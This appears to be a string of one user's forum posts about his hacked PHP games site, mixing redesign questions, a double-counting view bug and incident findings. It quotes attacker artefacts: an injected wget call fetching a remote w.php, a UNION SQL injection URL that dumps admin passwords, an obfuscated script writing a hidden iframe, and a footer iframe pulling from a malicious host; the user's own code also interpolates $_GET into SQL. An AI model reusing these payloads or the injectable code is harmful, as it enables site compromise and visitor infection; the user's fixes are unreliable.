hedgehog90

Hi, I have a games site called GPStudios.com I paid to have it built in 2009, but as you can see, it's looking a bit ropey these days compared to most other sites. Since having it built , I have made many alterations to the site, and gradually learnt a lot of html and php along the way. I make games myself, I do all the coding and all the graphics, so I feel quite confident that I can design all the assets of my site with relative ease. I've been using Dreamweaver for years now and I can now quite easily design a page of my own using php, http, javascript and mySQl. My only weakness is getting to grips with css, but I'm working on it. I want to redesign the site from the bottom up, ditch the old design and create something completely new. I will obviously use certain elements of the old site (much like I re use functions/engines/frameworks in all my games), but the site design is SUCH a mess that I don't think it would be wise to tidy it up. It's too far gone IMO. So, this is my rather broad question... I would like to know where I should start. What methods should I use? My site is currently made up of mostly .php files. Is this appropriate nowadays? I have a attached a few files to show you generally how the site is written. Because every page is largely the same, it uses a lot of includes. Even on a page with unique content, it is often included as a separate php (eg homepage_popular). Unfortunately, this makes it difficult to preview the site in the dreamweaver design view. Also, all the functions for the site are contained within a single functions.class.php file, which I was once told was very bad practice. Is it? I'd like to know generally a method or a practice I should use. When every page more or less uses the same template, is repeating the same div tags and includes necessary? Is there a better way of repeating myself? For instance, if I wanted for some reason to not have a header on my site, this would require me to change every single page. My current site has been a victim to php injection also, so I'd like to know exactly how I can prevent this happening in the new site. I'm not interested in designing it for multiple screen sizes, because most Flash games aren't really made for mobile devices. I think a 950/1000 px width static container is all I need. I am genuinely focussed on redesigning my site, and if it means I have to spend several months of weekends working on it and learning about stuff then so be it. I don't want to pay anyone else to do it, I want it to be 100% my own creation. index.php functions.class.php homepage_popular.php

OK, I've got the message. I'll fuck off now shall I? Sorry for wasting your time.

Indeed, my hole is truly massive.

I did this... or so I thought. Just to say "CLEAN IT" is not the kind of help I am looking for. Obviously, I'd rather get this fixed myself, otherwise I wouldn't have come here, so forgive me if I ignore that. While I am very grateful for the help and attention, I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems. Since I last posted, it appears the hacker has returned AGAIN, this time to change my password to the CMS. I haven't noticed any modifications though apart from this.

FFS, it's back... but now on the forum. I found an editted php file in the file: /forum/caches/tpl_AeroBlue_search_results.html.php and also in: /forum/styles/AeroBlue/template/search_body.html Both contain this line of code at the top: system('wget http://koliasoft.narod2.ru/w.php'); And that downloads and stores a file called w.php in the forum folder. (There's also another file called w.php.1, a copy) All the files in the cache folder appear to be modified almost daily, this must be normal. However, I can see that search_body.html was editted 02.38 AM today. I'm hoping that my fixes worked on the rest of the website, and that's why the problem files have moved to the forum, which i assumed was secure. You would think the latest PHPBB would protect itself from mysql injection??? But apparently not. So, probably from that w.php file, the footer.php had been editted again with that annoying iframe. I need to wait 24 hours until the Apache Logs update on my end before I can start seeing exactly how it was done... As I said earlier, I updated my PHPBB forum to the latest version a few days ago. The username and passwords for the 2 administrators on the forum are different to the other login details for the main site. I guess the person behind this could have also gotten my username and password on the old unprotected pages and made a note of it. For now, I won't change my username/password, because before I change them I want to have fixed the problem of mysql injection on the site. Help?

Great, I think I've got it sorted! I went through all the files, searched for every instance of _GET, _POST and _REQUEST, and depending on their data type (int or string) I have applied mysql_real_escape_string to strings, and (int) to ints. I hope this will be enough to stop the same hacker from ever hacking again. The last 2 days have been hell. Cunt. How can I encrypt my username and password when used in strings? I think there is only 1 instance of this in my code.

Posted a new topic: http://www.phpfreaks.com/forums/index.php?topic=335030.0

Now, obviously, I can't post the actual code that retrieves my admin login details, but the format of the code used is like this: /webpage.php?id=79+and+1=-1+union+/*asd*/+select+1,2,3,password_details,5,6,7,8,9,10,11,12,13,14,15,16+from+databasename/**/.table+limit+0,1-- On the page that loads the string with a _GET I added this code at the top: foreach ($_GET as $key => $value) { $_GET[$key] = mysql_real_escape_string($value); } But, when I eventually _GET("id"), it is no different than if I hadn't processed it with mysql_real_escape_string. The page loads just fine and arrogantly displays my login details like a... well... like a massive c*nt. How can I universally stop injections occurring? If I use (int), it's fine, but there are many other queries else where on the site where I need to _GET a string, for which the above injection code will get through despite mysql_real_escape_string. Help, please. * u

Looking at the logs, the beginning looked automatic, trying a query a second, but it then looks like it was done manually. There were long pauses between his attempts. I've downloaded the scripts from the site and I want to edit them so that this never happens again. I've been trying mysql_escape_real_string with the url he used to get my username and password, and I still get returned my details. It appears to do fuck all with that particular example.

I've worked part of it out now... I've been going through the logs for HOURS, it's incredibly tedious and boring. I've found the prick who did this: 89.232.248.163. Russian. Crafty. On May 15th, he used mysql injection to get my CMS login details. Once he had the login details he played around in the CMS and changed replaced a game file with w.php. It turns out you can upload phps despite what I said... After that, he went to playgame page for that speciifc game, and ran it over and over. I've got to admit, this guy was very quick and clever to do this - the back end is a bit of a mess and very hard for someone else to understand (or so I thought) So, that explains w.php, but it doesn't necessarilly explain game.js and the footer.php and index.php files being editted on May 31st. There is certainly absolutely no functionailty in the CMS to alter php files, or files of any kind. All the files it uploads/deletes are in the admin folder. Index.php and footer.php at are in the root. If w.php when run editted these files, then why didn't it do it 16 days prior? I can't find anything out through the log about these alterations except the time and day that game.js was first run. What now? More importantly, what are the steps to take to maike sure this never happens again?

Ok, I've found something. I was going through the logs, and I found the first occurance of the game.js file being loaded. I looked back a few seconds before this and found a "POST" that said: 188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24" I looked inside the /games/files/w/ and sure enough, there it was. I've attached it to show it to you. I have no idea how this was uploaded. It means it was likely done on the back-end and not through ftp, but the script for uploading new games does not allow the upload of php files, and it's not recorded by mySQL :/ .... I've just been thinking, how could the person who uploaded that file run it? Anything within /games/ is inaccessable because I had locked directory indexing (going through folders like a contents page) in the htaccess file... but last night I noticed my my htaccess had disappearred! I didn't even relate it to the apparrent hacking I had spent all day trying to fix. I re-uploaded an old one and didn't think anymore about it. It must have been deleted by the person who uploaded it, and then the script was run.... I can't see how it could have been uploaded through the back-end... the only evidence for it is that the w.php file is within a folder called w, which is exactly the same format as the games files. Help, please. [attachment deleted by admin]

I updated it this morning because i read that it might have been the problem. It's up to date, I'm on 3.0.8.

What search term should i search for in mySQL? Download the site and reupload it? I'm sorry, but I really don't see the sense in that, also, due to the amount of data on the website, it would take my internet connection 10s of hours to do this. This would be a last resort, it would be such a massive job. Hostgator are helping me at the moment, hopefully they'll sort it out to some degree.

I changed the password and username for my CMS earlier today, but as I just said (in my editted post), the hacking was certainly not done through the CMS. It's not capable of uploading anything but swfs, text and pictures.

Oh, silly I haven't mentioned yet the url of my website: www.gpstudios.com If by CMS you mean a back-end, then yes, however it can't add to files like index.php or anything like that. It's a games website. The backend allows me to upload/delete games and little else. The hacker must have gotten in through FTP. I have changed the password to the server account. I use Windows 7.... is that secure enough? I'm quite confident that my computer doesn't have any viruses or trojans. Can someone please explain to me how someone can get my personal details/upload files to the server space without my permission? I understand that hacking exists, but I've never truly gotten my head round how websites are hacked into without a data leak?

I've emailed hostgator once again with further information, and a link to this thread. I've decided not to take the site down temporarily, that seems like quite a massive thing to do for such a small problem. Well, unless it's not as small as I think?

Okay, well it's certainly been rooted. Just found this in footer.php since deleting the last one: <iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe> Please, tell me how I can get rid of this for good. Btw, I've tried SSH & SFTP in filezilla, but it can never connect. Also, I'm with Hostgator.

My website this morning was displaying 2 iframes that I know I never put there in the code: in index.php: <script type="text/javascript" charset="ISO-8859-1" src="game.js"></script> and in my public_html, there was a file called game.js that contained the following: O="=100%iframewidthheig".split('');Q="document.write('< src=http://lolkatdska.co.in/sTDS/go.php?sid=1 ht frameborder=0 margin=0 marginht=0></>');";o="";for(J=3;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"')); I am the only person with the login details to my website/cpanel, and I know I never uploaded/modified these files. I've spoken to my host, but they told me they didn't see anything (because obviously I removed these foreign objects as soon as i noticed them). They don't seem too bothered about a security risk :/ Anyway, I've changed my login details and all that. I mentioned above that I discovered 2 foreign iframes; the other one I found just a moment ago, again on my index page (but within a file called footer.php) in footer.php: <iframe src="<?= file_get_contents('http://white-star.biz/traffic_url.php?advertId=7&hash=919dac3bf6ad622657959934934bacf1'); ?>" width=0 height=0 border=0></iframe> How did I not notice this before??? I think it was placed there in the last hour or so, after I removed the first iframe. This is pretty weird, I changed my login details for cpanel/ftp and all that stuff over an hour ago!!! and since then I've found this new alteration that I never made! I dunno, maybe it was there along with the game.js iframe but I didn't notice.... but as soon as I fixed the first one, I checked, and everything was fine. Oh, and also, the php files index and footer are now have twice the number of returns as they originally did. e.g: <h1><?php include("ads/index_160x600_1.php"); ?></h1> <h2><?php include("ads/index_125x125_1.php"); ?></h2> <h3><?php include("ads/index_125x125_2.php"); ?></h3> Became: <h1><?php include("ads/index_160x600_1.php"); ?></h1> <h2><?php include("ads/index_125x125_1.php"); ?></h2> <h3><?php include("ads/index_125x125_2.php"); ?></h3> The only way these files could have been altered is if someone knows my login details... but this just is impossible, how did this happen? Is any of these weird files/modification familiar to anyone else? We had a problem with the site a month ago when google suspected our site as some sort of security threat... because we were hosting content from xxxxxxxxx.com, a site we have no affiliation with and doesn't feature on our site at all. It was all quite bizarre and the google thing went away within a day of contacting them. I have a feeling the same person/thing was behind this also. HELP!

Blimey. I got the following report after a single page load: 2011-01-23 08:03:01|0.06320700 1295791381[DOCUMENT_ROOT]=/home/hedgehog/public_html[GATEWAY_INTERFACE]=CGI/1.1[HTTP_ACCEPT]=image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*[HTTP_ACCEPT_ENCODING]=gzip, deflate[HTTP_ACCEPT_LANGUAGE]=en-GB[HTTP_CONNECTION]=Keep-Alive[HTTP_COOKIE]=__utma=26257003.834224986.1287699486.1295094119.1295468194.34; __utmz=26257003.1291634664.12.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gp%20studios; __qca=P0-113904449-1287699485875; phpbb3_n6bcx_u=1; phpbb3_n6bcx_k=; phpbb3_n6bcx_sid=9f35b1b309fbbb11bd17042a7d5d5ac4[HTTP_HOST]=www.gpstudios.com[HTTP_USER_AGENT]=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0C; InfoPath.3)[PATH]=/bin:/usr/bin[phpRC]=/home/hedgehog[QUERY_STRING]=[REDIRECT_STATUS]=200[REMOTE_ADDR]=87.114.127.242[REMOTE_PORT]=51322[REQUEST_METHOD]=GET[REQUEST_URI]=/playgame3.php[sCRIPT_FILENAME]=/home/hedgehog/public_html/playgame3.php[sCRIPT_NAME]=/playgame3.php[sERVER_ADDR]=174.120.83.250[sERVER_ADMIN]=webmaster@gpstudios.com[sERVER_NAME]=www.gpstudios.com[sERVER_PORT]=80[sERVER_PROTOCOL]=HTTP/1.1[sERVER_SIGNATURE]=<address>Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.gpstudios.com Port 80</address> [sERVER_SOFTWARE]=Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635[uNIQUE_ID]=TTw1FK54U@IAAFiuBboAAAEG[php_SELF]=/playgame3.php[REQUEST_TIME]=1295791381[argv]=Array[argc]=0<br /> 2011-01-23 08:03:07|0.30064900 1295791387[DOCUMENT_ROOT]=/home/hedgehog/public_html[GATEWAY_INTERFACE]=CGI/1.1[HTTP_ACCEPT]=*/*[HTTP_ACCEPT_ENCODING]=gzip, deflate[HTTP_ACCEPT_LANGUAGE]=en-GB[HTTP_CONNECTION]=Keep-Alive[HTTP_COOKIE]=__utma=26257003.834224986.1287699486.1295094119.1295468194.34; __utmz=26257003.1291634664.12.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gp%20studios; __qca=P0-113904449-1287699485875; phpbb3_n6bcx_u=1; phpbb3_n6bcx_k=; phpbb3_n6bcx_sid=9f35b1b309fbbb11bd17042a7d5d5ac4[HTTP_HOST]=www.gpstudios.com[HTTP_REFERER]=http://x.mochiads.com/srv/1/49876907fdb169d1.swf[HTTP_USER_AGENT]=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0C; InfoPath.3)[HTTP_X_FLASH_VERSION]=10,1,102,64[PATH]=/bin:/usr/bin[phpRC]=/home/hedgehog[QUERY_STRING]=[REDIRECT_STATUS]=200[REMOTE_ADDR]=87.114.127.242[REMOTE_PORT]=51322[REQUEST_METHOD]=GET[REQUEST_URI]=/playgame3.php[sCRIPT_FILENAME]=/home/hedgehog/public_html/playgame3.php[sCRIPT_NAME]=/playgame3.php[sERVER_ADDR]=174.120.83.250[sERVER_ADMIN]=webmaster@gpstudios.com[sERVER_NAME]=www.gpstudios.com[sERVER_PORT]=80[sERVER_PROTOCOL]=HTTP/1.1[sERVER_SIGNATURE]=<address>Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.gpstudios.com Port 80</address> [sERVER_SOFTWARE]=Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635[uNIQUE_ID]=TTw1G654U@IAAFiuBeAAAAEG[php_SELF]=/playgame3.php[REQUEST_TIME]=1295791387[argv]=Array[argc]=0<br /> check it out here: http://www.gpstudios.com/log_file.txt Can you make sense of this? Thanks for your help.

And how would you recommend I do this? Surely people must have run into this problem countless times before? Thanks for the help so far, sorry for the delay in replying.

Yes. Like i said - Flash is root of the problem.

I have made significant progress: I have made a file called playgame3.php, check it out: http://www.gpstudios.com/playgame3.php Here's the code within the file: <?php require_once("inc/config.inc.php"); $dbConnectID = mysql_connect(DBHOSTNAME, DBUSERNAME, DBPASSWORD); if($dbConnectID){ mysql_select_db(DBNAME, $dbConnectID); } // function get_view_count(){ $sql_query = "SELECT * FROM arse where gameid = 1"; $result = mysql_query($sql_query); if(mysql_num_rows($result)) { while($row = mysql_fetch_array($result)) { $viewcount = $row['timesplayed']; } } echo "timesplayed = ".$viewcount."</br>"; } get_view_count(); // $gameid = 29; if(!empty($gameid)){ $updatesql = "update arse set timesplayed = timesplayed+1, last_played = now() where gameid = 1"; mysql_query($updatesql); } // $final_width = 800; $final_height = 400; $newgamefilepath = "games/files/bunny-invasion-2.swf"; // $playcontent = "<script type=\"text/javascript\"> document.write('<OBJECT classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0\" WIDTH=\"$final_width\" HEIGHT=\"$final_height\" align=\"middle\" id=\"FlashContent\">'); document.write('<PARAM NAME=\"movie\" VALUE=\"$newgamefilepath\">'); document.write('<PARAM NAME=\"quality\" VALUE=\"high\">'); document.write('<PARAM NAME=\"AllowScriptAccess\" VALUE=\"never\">'); document.write('<embed width=\"$final_width\" height=\"$final_height\" align=\"middle\" src=\"$newgamefilepath\" quality=\"high\" NAME=\"FlashContent\" AllowScriptAccess=\"never\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/go/getflashplayer\"></embed>'); document.write('</OBJECT>'); </script> <noscript> <OBJECT classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0\" WIDTH=\"$final_width\" HEIGHT=\"$final_height\" align=\"middle\" id=\"FlashContent\"> <PARAM NAME=\"movie\" VALUE=\"$newgamefilepath\"> <PARAM NAME=\"quality\" VALUE=\"high\"> <PARAM NAME=\"AllowScriptAccess\" VALUE=\"never\"> <embed width=\"$final_width\" height=\"$final_height\" align=\"middle\" src=\"$newgamefilepath\" quality=\"high\" NAME=\"FlashContent\" AllowScriptAccess=\"never\" TYPE=\"application/x-shockwave-flash\" PLUGINSPAGE=\"http://www.macromedia.com/go/getflashplayer\"></embed> </OBJECT> </noscript>"; echo $playcontent; ?> Okay, so there it is - all the code is being executed within a single page (apart from inc/config.inc.php, but that's just my database login details) Run the page, the timesplayed = 150 reload the page, the timesplayed = 152 The problem lies within the flash content... Okay, I've done all the hard work, now how do I fix this!?

<?php session_start(); require_once("inc/config.inc.php"); require_once("class/functions.class.php"); require('drawrating.php'); $objGlobal = new globalclass(); require_once("class/site_register.php"); $gameid = $_GET['gameid']; if(!empty($gameid)){ $updatesql = "update FUCK set timesplayed = timesplayed+1, last_played = now() where gameid = $gameid"; mysql_query($updatesql); } $reviewlistings = $objGlobal->getgamereviews($gameid); $displaytitlesql = "SELECT * FROM games WHERE gameid = $gameid"; $displaytitle=$objGlobal->get_games($displaytitlesql); ... This is all that's relevant, because there is no other function or query referencing this new table, "FUCK". This is at the top of a file called playgame.php It is not included in any other php files, just here. ... I have just tried something new - I have uploaded a file called playgame2.php, like the table "FUCK" this is brand new, not refenced anywhere else. And it still happens. I have noticed though just a couple mintues ago, that when I load a game for the first time, it'll add 4. Then, when I reload the page, it'll add 2.

I have a games website called GPStudios.com. In a previous topic (that remains unresolved) I needed help fixing a view counter on a specific page that was sometimes executing a mysql query twice. I've since noticed that it is happening on other pages, maybe all of them. At the top of the php "playgame.php", is the statement: $updatesql = "update games set timesplayed = timesplayed+1, last_played = now() where gameid = $gameid"; mysql_query($updatesql); However, when I reload the page or check on phpMyAdmin, it has sometimes incremented by 2 (possibly 3). I have confirmed that no where else is calling the same query. I created a new table called "FUCK" and editted the code stated above to: $updatesql = "update FUCK set timesplayed = timesplayed+1, last_played = now() where gameid = $gameid"; mysql_query($updatesql); Upon loading the page, it did exactly the same thing. So I confirmed that the PHP must be being run twice. I have tried it on other pages on my website such as I had no luck on my other topic of the same problem, but hopefully someone might be able to tell me why or how this might be happening. Just remember - it is an absolute certainty that the query is NOT being run elsewhere. Thanks.

Why's no one replying? I really need to sort out this problem, I'll never give up. It's weird as hell... Please help.